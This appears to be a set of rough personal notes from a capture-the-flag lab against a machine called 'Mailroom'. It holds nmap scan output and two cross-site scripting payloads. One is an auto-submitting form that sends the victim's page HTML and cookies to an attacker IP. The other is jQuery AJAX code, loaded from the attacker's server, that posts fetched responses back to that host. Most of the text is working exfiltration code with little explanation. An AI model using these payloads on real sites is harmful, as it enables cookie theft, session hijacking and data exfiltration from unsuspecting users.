22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 94bb2ffcaeb9b182afd789811aa76ce5 (RSA)
| 256 821beb758b9630cf946e7957d9ddeca7 (ECDSA)
|_ 256 19fb45feb9e4275de5bbf35497dd68cf (ED25519)
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: The Mail Room
git.mailroom.htb and mailroom.htb
2fa thingy on the git
autosubmit form
<form id="autosubmit" action="<http://10.10.17.80:8081>" enctype="text/plain" method="POST">
<input id="1" name="1" type="hidden" />
<input id="2" name="2" type="hidden" />
<input type="submit" value="Submit Request" />
</form>
<script>
document.getElementById("1").value = JSON.stringify(document.body.innerHTML);
document.getElementById("2").value = JSON.stringify(document.cookie);
document.getElementById("autosubmit").submit();
</script>
the inquiry persists for a while, even after viewed
lets use ajax so person isn’t redirect
wget our own copy of https://code.jquery.com/jquery-3.6.0.min.js and host it on 999
<script src="<http://10.10.17.80:9999/jquery-3.6.0.min.js>"> </script>
<script>
$(document).ready(function() {
var result = $.ajax({
url: '<http://10.10.17.80:8081>',
method: 'POST',
cache: false,
async: false,
data: {'bruh':'bruh'},
success: function(response) {
console.log("Success 1");
},
error: function(data) {
console.log("Fail 1");
console.log(data.responseText);
}
}).responseText;
$.ajax({
url: '<http://10.10.17.80:8081>',
method: 'POST',
cache: false,
data: {'2ndpost':result},
async: false,
success: function(response) {
console.log("Success 2");
},
error: function(data) {
console.log("Fail 2");
console.log(data.responseText);
}
});
});
</script>